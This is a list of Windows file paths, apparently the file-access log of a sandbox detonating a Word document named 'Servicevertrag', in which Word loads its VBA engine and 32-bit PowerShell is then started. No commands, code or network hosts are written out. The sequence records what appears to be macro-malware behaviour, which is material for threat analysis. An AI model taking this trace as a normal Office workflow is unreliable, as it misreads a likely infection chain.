C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\EXP_PDF.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\EXP_XPS.DLL
C:\Windows\SysWOW64\FM20.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Csi.dll
C:\Program Files (x86)\Microsoft Office\Office14\MSOSTYLE.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\RICHED20.DLL
C:\Program Files (x86)\Microsoft Office\Office14\SAEXT.DLL
C:\Program Files (x86)\Microsoft Office\Office14\EntityPicker.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
C:\Program Files (x86)\Microsoft Office\Office14\EntityDataHandler.dll
C:\Windows\winsxs\manifests\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_51ca66a2bbe76806.manifest
C:\Windows\winsxs\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_51ca66a2bbe76806\
C:\Windows\winsxs\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_51ca66a2bbe76806\ATL90.dll
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_f0efb442f8a0f46c.manifest
C:\Windows\winsxs\manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2.manifest
C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2\
C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2\msvcr90.dll
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_f47e1bd6f6571810.manifest
C:\Windows\winsxs\manifests\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4bf5400abf9d60b7.manifest
C:\Windows\winsxs\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4bf5400abf9d60b7\
C:\Windows\winsxs\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4bf5400abf9d60b7\mfc90.dll
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_ecff360cfb2594f3.manifest
C:\Windows\winsxs\manifests\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4973eb1d754a9dc9.manifest
C:\Windows\winsxs\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4973eb1d754a9dc9\
C:\Windows\winsxs\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4973eb1d754a9dc9\MFC90CHT.DLL
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_f0bcaee084e72e5d.manifest
C:\Program Files (x86)\Microsoft Office\Office14\OART.DLL
C:\Program Files (x86)\Microsoft Office\Office14\GFX.DLL
C:\Program Files (x86)\Microsoft Office\Office14\OIMG.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\Portal\PortalConnectCore.dll
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\winsxs\FileMaps\program_files_x86_microsoft_office_office14_295527d9bd5a393d.cdf-ms
C:\Windows\AppPatch\pcamain.sdb
C:\Users\Public\Desktop
C:\Users\Public
C:\Users\Public\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Links
C:\Windows\sysnative\ieframe.dll
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
C:\Program Files (x86)\desktop.ini
C:\Program Files (x86)\Internet Explorer\iexplore.exe.Manifest
C:\program files (x86)\internet explorer\iexplore.exe
C:\program files (x86)\internet explorer\en-US\iexplore.exe.mui
C:\Windows\sysnative\Branding\Shellbrd\Shellbrd.dll
C:\Windows\Branding\ShellBrd\shellbrd.dll
C:\Users\user\AppData\Local\Temp\
C:\Users\user\AppData\Local\Temp
C:\Users\user\Desktop\CapeOutput.bin
C:\Users\Public\Desktop\CapeOutput.bin
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
C:\Program Files (x86)\Microsoft Office\Office14\MSTORE.EXE
C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE
C:\Python27\pythonw.exe
C:\Python27\python.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries
C:\Users\user\AppData\Local\Microsoft\Windows\Burn
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.3.Manifest
C:\Program Files (x86)\Microsoft Office\Office14\WWLIB.DLL
C:\Program Files (x86)\Microsoft Office\Office14\WTSAPI32.dll
C:\Windows\System32\wtsapi32.dll
C:\Program Files (x86)\Microsoft Office\Office14\MSIMG32.dll
C:\Windows\System32\msimg32.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.Local\
C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742
C:\Program Files (x86)\Microsoft Office\Office14\msi.dll
C:\Windows\System32\msi.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSO.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\*.*
C:\Users\user\AppData\Local\Temp\CVRDFC4.tmp
C:\Users\user\AppData\Local\Temp\CVRDFC4.tmp.cvr
C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\1033\MSOINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSORES.DLL
C:\Users\user\AppData\Roaming\Microsoft\Templates\
C:\Users\user\AppData\Roaming\Microsoft\Templates
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.config
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL
C:\Program Files (x86)\Microsoft Office\Office14\Normal.dotm
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5441CC-5075-4B4A-912D-1845B4B60578}.tmp
C:\Users\user\AppData\Local\Microsoft\Office\
C:\Users\user\AppData\Local\Microsoft\Office\Word.officeUI
C:\Users\user\AppData\Roaming\
C:\Users\user\AppData\Roaming\Microsoft\AddIns\
C:\Users\user\AppData\Local\
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\*.*
C:\Program Files (x86)\Microsoft Office\Office14\STARTUP\*.*
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\~$rvicevertrag[1].doc
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C748C9A8-5233-479B-BF2B-A74C3BC07527}.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3B010865-3F5E-4A31-8B77-A29525663C1A}.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\875991CB.czSJPY5
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EAC56381-98E9-43E8-8750-30BF9D94E9FF}.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL
C:\Windows\sysnative\C_932.NLS
C:\Windows\sysnative\C_949.NLS
C:\Windows\sysnative\C_950.NLS
C:\Windows\sysnative\C_936.NLS
C:\Users\user\Desktop\Normal
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL\3
C:\Users\user\AppData\Local\Temp\VBE
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FBIBLIO.DLL
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FPERSON.DLL
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\METCONV.DLL
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FSTOCK.DLL
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\IMCONTACT.DLL
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\MOFL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FDATE.DLL
C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FPLACE.DLL
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
C:\Program Files (x86)\Microsoft Office\Office14\usp10.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.LEX
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7FR.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7FR.LEX
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.LEX
C:\Program Files (x86)\Microsoft Office\Office14\CSS7DATA000A.DLL
C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS000A.dll
C:\Program Files (x86)\Microsoft Office\Office14\CSS7DATA000C.DLL
C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS000C.dll
C:\Program Files (x86)\Microsoft Office\Office14\CSS7DATA0009.DLL
C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS0009.dll
C:\Program Files (x86)\Microsoft Office\Office14\mssp3??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\
C:\Users\user\AppData\Roaming\Microsoft\Proof
C:\Users\user\AppData\Roaming\Microsoft\Proof\mssp3??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\
C:\Program Files (x86)\Common Files\Microsoft Shared
C:\Program Files (x86)\Common Files\Microsoft Shared\mssp3??.dll
C:\Program Files (x86)\Microsoft Office\Office14\mssp??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\mssp??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\mssp??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msp??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msgr2??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msgr2??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msgr2??.dll
C:\Program Files (x86)\Microsoft Office\Office14\msgr??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msgr??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msgr??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\gram??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\gram??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\gram??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msth3??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth3??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth3??.dll
C:\Program Files (x86)\Microsoft Office\Office14\msth32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msth??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msth232.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth232.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth232.dll
C:\Program Files (x86)\Microsoft Office\Office14\mshy3??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\mshy3??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\mshy3??.dll
C:\Program Files (x86)\Microsoft Office\Office14\hyph??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hyph??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hyph??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\mshy32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\mshy32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\mshy32.dll
C:\Program Files (x86)\Microsoft Office\Office14\hyph32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hyph32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hyph32.dll
C:\Program Files (x86)\Microsoft Office\Office14\hhc32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hhc32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hhc32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msdcsc32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msdcsc32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msdcsc32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msproof7.dll
C:\Users\user\AppData\Roaming\Microsoft\UProof\
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\1033\MSGR3EN.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3EN.LEX
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPCEXT.DLL
C:\Program Files (x86)\Microsoft Office\Office14\WinSCard.dll
C:\Windows\System32\WinSCard.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINHTTP.dll
C:\Windows\System32\winhttp.dll
C:\Program Files (x86)\Microsoft Office\Office14\webio.dll
C:\Windows\System32\webio.dll
C:\Windows\System32\p2pcollab.dll
C:\Windows\System32\qagentrt.dll
C:\Windows\System32\dnsapi.dll
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Windows\System32\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E34E75954A05FA2156EB895949C74728
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E34E75954A05FA2156EB895949C74728
C:\Users\user\AppData\Local\Temp\CabF299.tmp
C:\Users\user\AppData\Local\Temp\TarF29A.tmp
C:\Users\user\Documents\CabF299.tmp
C:\Windows\inf\
C:\Users\user\AppData\Local\Temp\CabF3E3.tmp
C:\Users\user\AppData\Local\Temp\TarF3E4.tmp
C:\Users\user\Documents\CabF3E3.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\CabF9FD.tmp
C:\Users\user\AppData\Local\Temp\TarF9FE.tmp
C:\Users\user\Documents\CabF9FD.tmp
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0
::\
::\{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
::\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
::\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
::\{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
::\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
C:\Users\user\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\
C:\Windows\System32\windowspowershell\v1.0\powershell_ise.exe
C:\Windows\SysWOW64\windowspowershell
C:\Windows\System32\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell\v1.0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\hh.exe
C:\Windows\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIICTOTTU4R5EN55EZ6A.temp
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POwershell.exe.config
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POwershell.exe.Local\
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\OLEAUT32.dll
C:\Windows\Globalization\en-gb.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POwershell.config
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\b1c511d8fad78ad3c5213b2b4fb02b8b\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4436815b432c313255af322f4ec3560d\System.Management.Automation.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
C:\Windows\System32\l_intl.nls
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\4f68cd04686e5dc5a55070d112d44bdf\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuratio#\f02737c83305687a68c088927a6c5a98\System.Configuration.Install.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.WSMan.Man#\ee28a075665b6bc23b6dae56903d431d\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\ad18f93fc713db2c4b29b25116c13bd8\System.Transactions.ni.dll
C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\3008a05e2928e2c1d856cc34e0422c17\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\8df695fb80187f65208d87229e81e8a2\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\8ce205027e30804d1b2deaffa0582735\Microsoft.PowerShell.Security.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_32\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\en-US\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\en-US\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\en\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\en\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.DirectorySer#\45ec12795950a7d54691591c615a9e3c\System.DirectoryServices.ni.dll
C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
C:\Windows\assembly\GAC_32\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
